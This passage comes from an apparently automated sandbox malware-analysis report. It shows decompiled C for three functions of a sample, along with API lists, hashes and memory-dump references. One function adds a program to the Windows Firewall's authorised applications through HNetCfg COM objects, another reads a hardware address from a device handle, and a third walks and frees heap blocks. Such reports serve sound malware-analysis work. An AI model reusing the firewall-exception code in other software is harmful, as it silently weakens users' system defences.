                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Pointer$ReadSizeWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 183897549-0
                                                                                                                                                                                          • Opcode ID: 119eaf61440065951dc80f7dfac61efb4dac191d7a79686b859d8e6ce98621d4
                                                                                                                                                                                          • Instruction ID: c82beb75a4d432f188e1cdd88196436728072362d3246e16d4138e9003981020
                                                                                                                                                                                          • Opcode Fuzzy Hash: 119eaf61440065951dc80f7dfac61efb4dac191d7a79686b859d8e6ce98621d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: F541D6717083025BDB28FE68CC84B6FB7D8EB98758F44092CF894D3250E664ED4587AA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C89880 Relevance: 9.1, APIs: 6, Instructions: 88memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00C89880() {
				void* _v4;
				char _v12;
				struct _PROCESS_HEAP_ENTRY _v40;
				void* _v44;
				signed int _t22;
				signed char _t31;
				void* _t33;
				void* _t51;
				long _t55;
				void* _t58;

				_push(0xffffffff);
				_push(0xd38858);
				_push( *[fs:0x0]);
				_t22 =  *0xd64070; // 0x8a9e1774
				_push(_t22 ^ _t58 - 0x00000020);
				 *[fs:0x0] =  &_v12;
				_t55 = 0;
				_t51 = GetProcessHeap();
				if(_t51 != 0) {
					_v44 = _t51;
					HeapLock(_t51);
					_v4 = 0;
					_v40.lpData = 0;
					while(HeapWalk(_t51,  &_v40) != 0) {
						_t31 = _v40.wFlags;
						if((_t31 & 0x00000033) != 0 || (_t31 & 0x00000004) == 0 || _v40.cbData < 0x10) {
							goto L11;
						} else {
							_t33 = _v40.lpData;
							if( *_t33 != 0x20120919 ||  *((intOrPtr*)(_t33 + 4)) != 0x58781234 ||  *((intOrPtr*)(_t33 + 8)) != 0x10 ||  *((intOrPtr*)(_t33 + 0xc)) == 0) {
								goto L11;
							} else {
								 *_t33 = 0;
								if( *0xd68cd8 != 0) {
									 *0xd68cd8 = 0;
								}
								HeapFree(_t51, 1, _v40);
								_t55 = 1;
							}
						}
						goto L16;
						L11:
					}
					L16:
					_v4 = 0xffffffff;
					HeapUnlock(_t51);
					 *[fs:0x0] = _v12;
					return _t55;
				} else {
					 *[fs:0x0] = _v12;
					return 0;
				}
			}













                                                                                                                                                                                          0x00c89880
                                                                                                                                                                                          0x00c89882
                                                                                                                                                                                          0x00c8988d
                                                                                                                                                                                          0x00c89895
                                                                                                                                                                                          0x00c8989c
                                                                                                                                                                                          0x00c898a1
                                                                                                                                                                                          0x00c898a7
                                                                                                                                                                                          0x00c898af
                                                                                                                                                                                          0x00c898b3
                                                                                                                                                                                          0x00c898cc
                                                                                                                                                                                          0x00c898d0
                                                                                                                                                                                          0x00c898d6
                                                                                                                                                                                          0x00c898e6
                                                                                                                                                                                          0x00c898ee
                                                                                                                                                                                          0x00c898f5
                                                                                                                                                                                          0x00c898fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89907
                                                                                                                                                                                          0x00c89907
                                                                                                                                                                                          0x00c89911
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89935
                                                                                                                                                                                          0x00c8993c
                                                                                                                                                                                          0x00c89942
                                                                                                                                                                                          0x00c89944
                                                                                                                                                                                          0x00c89944
                                                                                                                                                                                          0x00c89956
                                                                                                                                                                                          0x00c8995c
                                                                                                                                                                                          0x00c8995c
                                                                                                                                                                                          0x00c89911
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c89927
                                                                                                                                                                                          0x00c8992f
                                                                                                                                                                                          0x00c89961
                                                                                                                                                                                          0x00c89961
                                                                                                                                                                                          0x00c8996a
                                                                                                                                                                                          0x00c89976
                                                                                                                                                                                          0x00c89985
                                                                                                                                                                                          0x00c898b5
                                                                                                                                                                                          0x00c898bb
                                                                                                                                                                                          0x00c898ca
                                                                                                                                                                                          0x00c898ca

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(8A9E1774), ref: 00C898A9
                                                                                                                                                                                          • HeapLock.KERNEL32(00000000), ref: 00C898D0
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?), ref: 00C898EA
                                                                                                                                                                                          • HeapWalk.KERNEL32(00000000,?), ref: 00C8992D
                                                                                                                                                                                          • HeapUnlock.KERNEL32(00000000), ref: 00C8996A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Walk$LockProcessUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2227978497-0
                                                                                                                                                                                          • Opcode ID: 6605fe8f08d668747574328fcfa15bd6bf07499e64ad8b37beba74adb7f1e39d
                                                                                                                                                                                          • Instruction ID: 512a786fec23c1de4d5427e226b1fea9eaffaf7cb373bb5c30806f33d0ba16d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6605fe8f08d668747574328fcfa15bd6bf07499e64ad8b37beba74adb7f1e39d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0312531608305DFC720EF19D844B7BB7E8EB45728F04462EF864932A0D779A945CB6A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C99D88 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C99D88(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t80;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				void* _t104;
				intOrPtr* _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr _t145;
				void* _t146;

				_push(0x1c);
				E00D0158D(0xd2fe92, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t146 - 4)) = 0;
				 *((intOrPtr*)(_t146 - 0x20)) = 0;
				E00C97412(_t146 - 0x20, L"HNetCfg.FwMgr", 0, 0x17);
				_t75 =  *((intOrPtr*)(_t146 - 0x20));
				if(_t75 == 0) {
					L28:
					 *((char*)(_t146 - 4)) = 0;
					if(_t75 != 0) {
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t76 = 0;
					L31:
					return E00D01632(_t76);
				}
				 *((intOrPtr*)(_t146 - 0x1c)) = 0;
				 *((char*)(_t146 - 4)) = 2;
				 *((intOrPtr*)( *_t75 + 0x1c))(_t75, _t146 - 0x1c);
				_t80 =  *((intOrPtr*)(_t146 - 0x1c));
				if(_t80 == 0) {
					L25:
					 *((char*)(_t146 - 4)) = 1;
					if(_t80 != 0) {
						 *((intOrPtr*)( *_t80 + 8))(_t80);
					}
					_t75 =  *((intOrPtr*)(_t146 - 0x20));
					goto L28;
				}
				 *((intOrPtr*)(_t146 - 0x18)) = 0;
				 *((char*)(_t146 - 4)) = 3;
				 *((intOrPtr*)( *_t80 + 0x1c))(_t80, _t146 - 0x18);
				if( *((intOrPtr*)(_t146 - 0x18)) == 0) {
					L22:
					_t83 =  *((intOrPtr*)(_t146 - 0x18));
					 *((char*)(_t146 - 4)) = 2;
					if(_t83 != 0) {
						 *((intOrPtr*)( *_t83 + 8))(_t83);
					}
					_t80 =  *((intOrPtr*)(_t146 - 0x1c));
					goto L25;
				}
				 *((intOrPtr*)(_t146 - 0x14)) = 0;
				E00C974EF(_t146 - 0x14, L"HNetCfg.FwAuthorizedApplication", 0, 0x17);
				if( *((intOrPtr*)(_t146 - 0x14)) == 0) {
					L20:
					_t86 =  *((intOrPtr*)(_t146 - 0x14));
					 *((char*)(_t146 - 4)) = 3;
					if(_t86 != 0) {
						 *((intOrPtr*)( *_t86 + 8))(_t86);
					}
					goto L22;
				}
				 *((intOrPtr*)(_t146 - 0x24)) = 0;
				 *((char*)(_t146 - 4)) = 5;
				E00C97F97(_t146 - 0x24,  *((intOrPtr*)(_t146 + 0xc)));
				_t89 =  *((intOrPtr*)(_t146 - 0x14));
				 *((intOrPtr*)( *_t89 + 0x20))(_t89,  *((intOrPtr*)(_t146 - 0x24)));
				_t91 =  *((intOrPtr*)(_t146 - 0x14));
				 *((intOrPtr*)( *_t91 + 0x38))(_t91, 0);
				_t93 =  *((intOrPtr*)(_t146 - 0x14));
				 *((intOrPtr*)( *_t93 + 0x30))(_t93, 2);
				_t95 =  *((intOrPtr*)(_t146 - 0x14));
				 *((intOrPtr*)( *_t95 + 0x48))(_t95, 0xffffffff);
				E00C97F97(_t146 - 0x24,  *((intOrPtr*)(_t146 + 8)));
				_t98 =  *((intOrPtr*)(_t146 - 0x14));
				_t145 =  *((intOrPtr*)(_t146 - 0x24));
				 *((intOrPtr*)( *_t98 + 0x28))(_t98, _t145);
				 *((intOrPtr*)(_t146 - 0x28)) = 0;
				_t100 =  *((intOrPtr*)(_t146 - 0x18));
				 *((char*)(_t146 - 4)) = 6;
				 *((intOrPtr*)( *_t100 + 0x50))(_t100, _t146 - 0x28);
				_t102 =  *((intOrPtr*)(_t146 - 0x28));
				if(_t102 == 0) {
					L17:
					 *((char*)(_t146 - 4)) = 5;
					if(_t102 != 0) {
						 *((intOrPtr*)( *_t102 + 8))(_t102);
					}
					__imp__#6(_t145);
					goto L20;
				}
				_t104 =  *((intOrPtr*)( *_t102 + 0x24))(_t102, _t145);
				_t102 =  *((intOrPtr*)(_t146 - 0x28));
				if(_t104 < 0) {
					goto L17;
				}
				 *((char*)(_t146 - 4)) = 5;
				if(_t102 != 0) {
					 *((intOrPtr*)( *_t102 + 8))(_t102);
				}
				__imp__#6(_t145);
				_t105 =  *((intOrPtr*)(_t146 - 0x14));
				 *((char*)(_t146 - 4)) = 3;
				if(_t105 != 0) {
					 *((intOrPtr*)( *_t105 + 8))(_t105);
				}
				_t106 =  *((intOrPtr*)(_t146 - 0x18));
				 *((char*)(_t146 - 4)) = 2;
				if(_t106 != 0) {
					 *((intOrPtr*)( *_t106 + 8))(_t106);
				}
				_t107 =  *((intOrPtr*)(_t146 - 0x1c));
				 *((char*)(_t146 - 4)) = 1;
				if(_t107 != 0) {
					 *((intOrPtr*)( *_t107 + 8))(_t107);
				}
				_t108 =  *((intOrPtr*)(_t146 - 0x20));
				 *((char*)(_t146 - 4)) = 0;
				if(_t108 != 0) {
					 *((intOrPtr*)( *_t108 + 8))(_t108);
				}
				_t76 = 1;
				goto L31;
			}






















                                                                                                                                                                                          0x00c99d88
                                                                                                                                                                                          0x00c99d8f
                                                                                                                                                                                          0x00c99d96
                                                                                                                                                                                          0x00c99d99
                                                                                                                                                                                          0x00c99da7
                                                                                                                                                                                          0x00c99dac
                                                                                                                                                                                          0x00c99db1
                                                                                                                                                                                          0x00c99f30
                                                                                                                                                                                          0x00c99f30
                                                                                                                                                                                          0x00c99f35
                                                                                                                                                                                          0x00c99f3a
                                                                                                                                                                                          0x00c99f3a
                                                                                                                                                                                          0x00c99f3d
                                                                                                                                                                                          0x00c99f3f
                                                                                                                                                                                          0x00c99f44
                                                                                                                                                                                          0x00c99f44
                                                                                                                                                                                          0x00c99db7
                                                                                                                                                                                          0x00c99dc1
                                                                                                                                                                                          0x00c99dc5
                                                                                                                                                                                          0x00c99dc8
                                                                                                                                                                                          0x00c99dcd
                                                                                                                                                                                          0x00c99f1f
                                                                                                                                                                                          0x00c99f1f
                                                                                                                                                                                          0x00c99f25
                                                                                                                                                                                          0x00c99f2a
                                                                                                                                                                                          0x00c99f2a
                                                                                                                                                                                          0x00c99f2d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99f2d
                                                                                                                                                                                          0x00c99dd3
                                                                                                                                                                                          0x00c99ddd
                                                                                                                                                                                          0x00c99de1
                                                                                                                                                                                          0x00c99de7
                                                                                                                                                                                          0x00c99f0b
                                                                                                                                                                                          0x00c99f0b
                                                                                                                                                                                          0x00c99f0e
                                                                                                                                                                                          0x00c99f14
                                                                                                                                                                                          0x00c99f19
                                                                                                                                                                                          0x00c99f19
                                                                                                                                                                                          0x00c99f1c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99f1c
                                                                                                                                                                                          0x00c99ded
                                                                                                                                                                                          0x00c99dfb
                                                                                                                                                                                          0x00c99e03
                                                                                                                                                                                          0x00c99efa
                                                                                                                                                                                          0x00c99efa
                                                                                                                                                                                          0x00c99efd
                                                                                                                                                                                          0x00c99f03
                                                                                                                                                                                          0x00c99f08
                                                                                                                                                                                          0x00c99f08
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99f03
                                                                                                                                                                                          0x00c99e09
                                                                                                                                                                                          0x00c99e12
                                                                                                                                                                                          0x00c99e16
                                                                                                                                                                                          0x00c99e1b
                                                                                                                                                                                          0x00c99e24
                                                                                                                                                                                          0x00c99e27
                                                                                                                                                                                          0x00c99e2e
                                                                                                                                                                                          0x00c99e31
                                                                                                                                                                                          0x00c99e39
                                                                                                                                                                                          0x00c99e3c
                                                                                                                                                                                          0x00c99e44
                                                                                                                                                                                          0x00c99e4d
                                                                                                                                                                                          0x00c99e52
                                                                                                                                                                                          0x00c99e55
                                                                                                                                                                                          0x00c99e5c
                                                                                                                                                                                          0x00c99e5f
                                                                                                                                                                                          0x00c99e62
                                                                                                                                                                                          0x00c99e6c
                                                                                                                                                                                          0x00c99e70
                                                                                                                                                                                          0x00c99e73
                                                                                                                                                                                          0x00c99e78
                                                                                                                                                                                          0x00c99ee5
                                                                                                                                                                                          0x00c99ee5
                                                                                                                                                                                          0x00c99eeb
                                                                                                                                                                                          0x00c99ef0
                                                                                                                                                                                          0x00c99ef0
                                                                                                                                                                                          0x00c99ef4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99ef4
                                                                                                                                                                                          0x00c99e7e
                                                                                                                                                                                          0x00c99e83
                                                                                                                                                                                          0x00c99e86
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c99e88
                                                                                                                                                                                          0x00c99e8e
                                                                                                                                                                                          0x00c99e93
                                                                                                                                                                                          0x00c99e93
                                                                                                                                                                                          0x00c99e97
                                                                                                                                                                                          0x00c99e9d
                                                                                                                                                                                          0x00c99ea0
                                                                                                                                                                                          0x00c99ea6
                                                                                                                                                                                          0x00c99eab
                                                                                                                                                                                          0x00c99eab
                                                                                                                                                                                          0x00c99eae
                                                                                                                                                                                          0x00c99eb1
                                                                                                                                                                                          0x00c99eb7
                                                                                                                                                                                          0x00c99ebc
                                                                                                                                                                                          0x00c99ebc
                                                                                                                                                                                          0x00c99ebf
                                                                                                                                                                                          0x00c99ec2
                                                                                                                                                                                          0x00c99ec8
                                                                                                                                                                                          0x00c99ecd
                                                                                                                                                                                          0x00c99ecd
                                                                                                                                                                                          0x00c99ed0
                                                                                                                                                                                          0x00c99ed3
                                                                                                                                                                                          0x00c99ed8
                                                                                                                                                                                          0x00c99edd
                                                                                                                                                                                          0x00c99edd
                                                                                                                                                                                          0x00c99ee2
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00C99D8F
                                                                                                                                                                                            • Part of subcall function 00C97412: CLSIDFromProgID.OLE32(?,?), ref: 00C97431
                                                                                                                                                                                            • Part of subcall function 00C97412: CoCreateInstance.OLE32(?,?,?,00D3A8B0), ref: 00C97449
                                                                                                                                                                                            • Part of subcall function 00C974EF: CLSIDFromProgID.OLE32(?,?), ref: 00C9750E
                                                                                                                                                                                            • Part of subcall function 00C974EF: CoCreateInstance.OLE32(?,?,?,00D3A8C0), ref: 00C97526
                                                                                                                                                                                            • Part of subcall function 00C97F97: SysFreeString.OLEAUT32 ref: 00C97FA6
                                                                                                                                                                                            • Part of subcall function 00C97F97: SysAllocString.OLEAUT32(?), ref: 00C97FB1
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C99E97
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00C99EF4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Free$CreateFromInstanceProg$AllocH_prolog3_catch
                                                                                                                                                                                          • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                                          • API String ID: 2025269547-1951265404
                                                                                                                                                                                          • Opcode ID: af01f468171c3b166c0c270404687bc59ea2417220345ccd281dbd5f75a91bf3
                                                                                                                                                                                          • Instruction ID: f6b0bff40bbd33a599e8888da2f94301c9b6a26b047f85e22b8f102a04ee5dfb
                                                                                                                                                                                          • Opcode Fuzzy Hash: af01f468171c3b166c0c270404687bc59ea2417220345ccd281dbd5f75a91bf3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C61EC74A01249DFCF10DFE8C988AADBBB9EF49305F2444ACE516EB251C7359E45CB21
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C943E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                          			E00C943E0(intOrPtr* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				struct _SECURITY_ATTRIBUTES* _v4;
				char _v12;
				signed int _v16;
				short _v536;
				signed char _v539;
				signed char _v540;
				signed char _v541;
				signed char _v542;
				signed int _v543;
				signed char _v544;
				struct _SECURITY_ATTRIBUTES* _v548;
				char _v552;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				signed int _t30;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t57;
				intOrPtr _t66;
				intOrPtr* _t72;
				intOrPtr _t73;
				void* _t74;
				void* _t76;
				void* _t77;
				intOrPtr _t79;
				void* _t81;
				signed int _t82;
				void* _t83;
				signed int _t84;

				_push(0xffffffff);
				_push(0xd388db);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x21c;
				_t28 =  *0xd64070; // 0x8a9e1774
				_v16 = _t28 ^ _t82;
				_t30 =  *0xd64070; // 0x8a9e1774
				_push(_t30 ^ _t82);
				 *[fs:0x0] =  &_v12;
				_t79 = _a8;
				_t72 = __ecx;
				E00C964E0(0x208,  &_v536, L"\\\\.\\%s", _a4);
				_t76 = 0;
				_t83 = _t82 + 8;
				_v548 = 0;
				_v4 = 0;
				_t37 = CreateFileW( &_v536, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t37 != 0xffffffff) {
					_t76 = _t37;
					_v548 = _t76;
					L2:
					_v552 = 0;
					_t38 = E00C94000(4, _t76, 0x10213,  &_v552);
					_t84 = _t83 + 0xc;
					if(_t38 == 0) {
						L14:
						_t69 = 4;
						_t39 = E00C94000(4, _t76, 0x10202,  &_v552);
						_t84 = _t84 + 0xc;
						if(_t39 == 0) {
							L20:
							_t73 = 0;
							_t17 = _t73 + 6; // 0x6
							_t69 = _t17;
							_t41 = E00C94000(_t17, _t76, 0x1010101,  &_v544);
							_t84 = _t84 + 0xc;
							if(_t41 != 0) {
								_push(_v539 & 0x000000ff);
								_push(_v540 & 0x000000ff);
								_t69 = _v543 & 0x000000ff;
								_push(_v541 & 0x000000ff);
								_push(_v542 & 0x000000ff);
								_push(_v543 & 0x000000ff);
								E00C926B0(_t79, 0x64, "%02X%02X%02X%02X%02X%02X", _v544 & 0x000000ff);
								_t84 = _t84 + 0x24;
								_t73 = 1;
							}
							_v4 = 0xffffffff;
							if(_t76 != 0) {
								CloseHandle(_t76);
							}
							_t42 = _t73;
							L25:
							 *[fs:0x0] = _v12;
							_pop(_t74);
							_pop(_t77);
							_pop(_t57);
							return E00D0071A(_t42, _t57, _v16 ^ _t84, _t69, _t74, _t77);
						}
						_t66 = _v552;
						_t49 = E00C94380(_t66);
						if(_t49 != 0) {
							L11:
							_v4 = 0xffffffff;
							if(_t76 != 0) {
								CloseHandle(_t76);
							}
							L13:
							_t42 = 0;
							goto L25;
						}
						if(_t66 == 1 || _t66 == 9) {
							_t49 = 1;
						}
						 *_t72 = _t49;
						goto L20;
					}
					_t51 = _v552;
					if(_t51 == 0) {
						goto L14;
					}
					if(_t51 == 0xe) {
						goto L20;
					}
					if(_t51 == 1 || _t51 == 9) {
						_t52 = 1;
					} else {
						_t52 = 0;
					}
					 *_t72 = _t52;
					if(_t52 != 0) {
						goto L20;
					} else {
						goto L11;
					}
				}
				if(E00C963C0() != 0) {
					goto L13;
				}
				goto L2;
			}








































                                                                                                                                                                                          0x00c943e0
                                                                                                                                                                                          0x00c943e2
                                                                                                                                                                                          0x00c943ed
                                                                                                                                                                                          0x00c943ee
                                                                                                                                                                                          0x00c943f4
                                                                                                                                                                                          0x00c943fb
                                                                                                                                                                                          0x00c94406
                                                                                                                                                                                          0x00c9440d
                                                                                                                                                                                          0x00c94415
                                                                                                                                                                                          0x00c94422
                                                                                                                                                                                          0x00c94438
                                                                                                                                                                                          0x00c9443a
                                                                                                                                                                                          0x00c9443f
                                                                                                                                                                                          0x00c94441
                                                                                                                                                                                          0x00c94446
                                                                                                                                                                                          0x00c9445f
                                                                                                                                                                                          0x00c94466
                                                                                                                                                                                          0x00c9446f
                                                                                                                                                                                          0x00c944b5
                                                                                                                                                                                          0x00c944b7
                                                                                                                                                                                          0x00c9447a
                                                                                                                                                                                          0x00c9448a
                                                                                                                                                                                          0x00c9448e
                                                                                                                                                                                          0x00c94493
                                                                                                                                                                                          0x00c94498
                                                                                                                                                                                          0x00c944e5
                                                                                                                                                                                          0x00c944f0
                                                                                                                                                                                          0x00c944f5
                                                                                                                                                                                          0x00c944fa
                                                                                                                                                                                          0x00c944ff
                                                                                                                                                                                          0x00c94521
                                                                                                                                                                                          0x00c94526
                                                                                                                                                                                          0x00c9452e
                                                                                                                                                                                          0x00c9452e
                                                                                                                                                                                          0x00c94531
                                                                                                                                                                                          0x00c94536
                                                                                                                                                                                          0x00c9453b
                                                                                                                                                                                          0x00c9454c
                                                                                                                                                                                          0x00c94552
                                                                                                                                                                                          0x00c94553
                                                                                                                                                                                          0x00c94558
                                                                                                                                                                                          0x00c9455e
                                                                                                                                                                                          0x00c9455f
                                                                                                                                                                                          0x00c94569
                                                                                                                                                                                          0x00c9456e
                                                                                                                                                                                          0x00c94571
                                                                                                                                                                                          0x00c94571
                                                                                                                                                                                          0x00c94576
                                                                                                                                                                                          0x00c94583
                                                                                                                                                                                          0x00c94586
                                                                                                                                                                                          0x00c94586
                                                                                                                                                                                          0x00c9458c
                                                                                                                                                                                          0x00c9458e
                                                                                                                                                                                          0x00c94595
                                                                                                                                                                                          0x00c9459d
                                                                                                                                                                                          0x00c9459e
                                                                                                                                                                                          0x00c945a0
                                                                                                                                                                                          0x00c945b5
                                                                                                                                                                                          0x00c945b5
                                                                                                                                                                                          0x00c94501
                                                                                                                                                                                          0x00c94507
                                                                                                                                                                                          0x00c9450e
                                                                                                                                                                                          0x00c944c8
                                                                                                                                                                                          0x00c944c8
                                                                                                                                                                                          0x00c944d5
                                                                                                                                                                                          0x00c944d8
                                                                                                                                                                                          0x00c944d8
                                                                                                                                                                                          0x00c944de
                                                                                                                                                                                          0x00c944de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c944de
                                                                                                                                                                                          0x00c94513
                                                                                                                                                                                          0x00c9451a
                                                                                                                                                                                          0x00c9451a
                                                                                                                                                                                          0x00c9451f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9451f
                                                                                                                                                                                          0x00c9449a
                                                                                                                                                                                          0x00c944a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c944a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c944aa
                                                                                                                                                                                          0x00c944bd
                                                                                                                                                                                          0x00c944b1
                                                                                                                                                                                          0x00c944b1
                                                                                                                                                                                          0x00c944b1
                                                                                                                                                                                          0x00c944c2
                                                                                                                                                                                          0x00c944c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c944c6
                                                                                                                                                                                          0x00c94478
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C964E0: _vswprintf_s.LIBCMT ref: 00C9650C
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000000), ref: 00C94466
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C944D8
                                                                                                                                                                                            • Part of subcall function 00C963C0: GetLastError.KERNEL32(00C9689C), ref: 00C963C0
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C94586
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
